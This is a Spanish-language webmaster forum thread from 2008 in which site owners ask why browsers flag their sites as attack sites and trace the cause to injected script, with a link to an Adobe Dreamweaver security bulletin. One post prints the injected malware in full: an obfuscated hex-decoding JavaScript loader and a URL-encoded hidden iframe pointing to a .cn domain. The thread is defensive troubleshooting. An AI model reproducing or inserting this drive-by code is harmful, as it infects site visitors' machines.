Mi web aparece como "web atacante"

C

capitanmosca #1 Sep '08

Hola! y un saludo a todos en el que es mi primer mensaje...

desde hace 3 ó 4 días, al abrir mi web con Firefox 3 o Google Chrome, aparece un mensaje diciendo que "Es una web atacante", con varios avisos de advertencia, lo que hace que lógicamente la gente se acojone y deje de entrar. No entiendo por qué sale eso ya que no he colgado nada extraño estos últimos días. Y ahora no tengo ni idea de qué hacer para hacer que deje de salir eso.

Podéis ver este mensaje vosotros mismos, si abrís con esos dos navegadores la url: http://www.musicapolar.com (podéis entrar sin peligro que ya os digo que es una web normal sobre grupos de música).

Alguien sabe qué puedo hacer?

Gracias!

Soltrac #2 Sep '08 MV Wizard

Lo pone bien claro...

f you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Z3R0KULL #3 Sep '08 Inesperado suceso

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=es-ES&site=http://www.musicapolar.com/

Crawler #4 Sep '08

lo mismo le ha pasado a la web de un cliente hoy.

Lo gracioso, leyendo lo que pone ahi (con mi inglés cutre salchichero) entiendo que:

Of the 17 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent.

vale, en los ultimos 90 dias, 2 paginas "mias" resulta que descargan e instalan mierda en el pc del usuario.
Toda la web es html oldschool, ni un triste formulario por donde hayan podido inyectar código (o eso creo en mi ingenuidad)

Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 10 new processes on the target machine.
ermm, y no podrian decirme en que paginas están y que puñetero exploit es?

Malicious software is hosted on 5 domain(s), including virtualceck.com, 196.32.220.0, traffic-exchange.biz.
Vale, esto puede serme util, el script viene de esos 5 dominios. Coño, si solo me dice 3!

Y el gran final:
Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, XXXXX did not appear to function as an intermediary for the infection of any sites.

No, this site has not hosted malicious software over the past 90 days.


In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.[/i]

O sea, en esos 90 dias que dice que he 2 paginas "mias" andan infectando pcs por ahi, ahora em dice que no tengo ese "software malicioso" ni he sido intermediario de la infección de ninguna otra web.
En que quedamos, infecto o no infecto?

/me no entiende NADA

P.D. En el html tenian rutas absolutas, es posible que al tener enlaces como www.tal.com y otros como tal.com (sin www) haya pensado que viene código de un sitio distinto? Puede estar relacionado?
si no es eso, no tengo ni pajolera idea de que hacer :!

P.D.2 Veo que el cliente ha subido carpetas con archivos al servidor web. Apesta a que es por aqui por donde ha petado.

C

capitanmosca #5 Sep '08

Ya he visto que había artículos de ayuda pero el inglés lo tengo bastante flojo y no lo entiendo bien. Por eso pedía ayuda.

Así que por favor, si alguien puede darme pistas o lo que sea, lo agradeceré mucho...

un saludo.

wsky #6 Sep '08

Es fácil, borra esa línea de código, después usando las Webmaster Tools de Google pides revisión para que te quiten el aviso, no tarda ni siquiera un dia.

Crawler #7 Sep '08

parece que no es tan facil, borraron el contenido del servidor, pasaron antivirus, pasamos antivirus en nuestra copia local. Todo limpio, google pasa, se quita la advertencia de seguridad, y todos felices.

En 3 dias nos han vuelto a infectar.
Por lo que parece está relacionado con el script AC_RunActiveContent.js (que te incluye dreamweaver para incrustar flash) , googleando por ahi encuentro algo llamado "superbowl hack", http://www.eset.com/threat-center/blog/?p=39 y... hasta aqui he llegado.

Si ves el código fuente de la web (ctrl+u) se ve limpio, si usas firebug encuentras lo siguiente:

<S C R I P T>function c71307925162m48d0a4131c539(m48d0a4131cd0d){ function m48d0a4131d4e1(){return 16;} return (parseInt(m48d0a4131cd0d,m48d0a4131d4e1()));}function m48d0a4131e489(m48d0a4131ec5d){ var m48d0a413203d9=2; var m48d0a4131f431='';m48d0a41321380=String.fromCharCode;for(m48d0a4131fc04=0;
m48d0a4131fc04<m48d0a4131ec5d.length;m48d0a4131fc04+=m48d0a413203d9){ m48d0a4131f431+=(m48d0a41321380(c71307925162m48d0a4131c539(m48d0a4131ec5d.substr(m48d0a4131fc04,m48d0a413203d9))));}return m48d0a4131f431;} var z41='';
var m48d0a41321b54='3C7'+z41+'3637'+z41+'2697'+z41+'07'+z41+'43E696628216D7'+z41+'96961297'+z41+'B646F637'+z41+
'56D656E7'+z41+'42E7'+z41+'7'+z41+'7'+z41+'2697'+z41+'465287'+z41+'56E657'+z41+'363617'+z41+'065282027'+z41+
'2533632536392536362537'+z41+'32253631253664253635253230253665253631253664253635253364253633253337'+z41+
'2532302537'+z41+'332537'+z41+'32253633253364253237'+z41+'2536382537'+z41+'342537'+z41+'342537'+z41+
'302533612532662532662536632536662536322536312536652536312536322537'+z41+'352536332536622537'+z41+
'332532652536332536652532662536652536352537'+z41+'37'+z41+'2532652536382537'+z41+'34253664253663253366253237'
+z41+'2532622534642536312537'+z41+'342536382532652537'+z41+'322536662537'+z41+
'352536652536342532382534642536312537'+z41+'342536382532652537'+z41+
'32253631253665253634253666253664253238253239253261253339253330253333253338253334253239253262253237'+z41+
'253332253237'+z41+'2532302537'+z41+'37'+z41+'2536392536342537'+z41+
'34253638253364253332253336253339253230253638253635253639253637'+z41+'2536382537'+z41+
'342533642533332533332533362532302537'+z41+'332537'+z41+'342537'+z41+'39253663253635253364253237'+z41+
'2536342536392537'+z41+'332537'+z41+'302536632536312537'+z41+'39253361253230253665253666253665253635253237'+
z41+'2533652533632532662536392536362537'+z41+'3225363125366425363525336527'+z41+'29293B7'+z41+'D7'+z41+'6617'+
z41+'2206D7'+z41+'969613D7'+z41+'47'+z41+'27'+z41+'5653B3C2F7'+z41+'3637'+z41+'2697'+z41+'07'+z41+'43E';
document.write(m48d0a4131e489(m48d0a41321b54));</script>
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61
%6d%65%3d%63%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6c%6f
%62%61%6e%61%62%75%63%6b%73%2e%63%6e%2f%6e%65%77%2e%68%74%6d
%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e
%72%61%6e%64%6f%6d%28%29%2a%39%30%33%38%34%29%2b%27%32%27%20
%77%69%64%74%68%3d%32%36%39%20%68%65%69%67%68%74%3d%33%33%36
%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e
%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script><iframe name="c7" src="http://lobanabucks.cn/new.html?" +math.round(math.random()*90384)+="" 2="" style="display: none;" width="269" height="336"></iframe><script>check_content()</S C R I P T>

Saltos de lineas añadidos para no reventar las tablas (o no mucho)

Seguiré googleando, pero si alguien sabe algo... se agradece un cable

Crawler #8 Sep '08

Actualice a Dreamweaver y Contribute para solucionar posibles vulnerabilidades a los ataques de secuencia de comandos en varios sitios web

Fecha de publicación: 16 de enero de 2008

Identificador de vulnerabilidad: APSB08-01

Número CVE: CVE-2007-6244, CVE-2007-6637

Plataforma: todas las plataformas

Versiones de software afectadas: Dreamweaver CS3, Dreamweaver 8, Contribute CS3, Contribute 4

http://www.adobe.com/es/support/security/bulletins/apsb08-01.html?trackingid=BUCNA&pss=dw_9.0_win_es_full___20040226

Usuarios habituales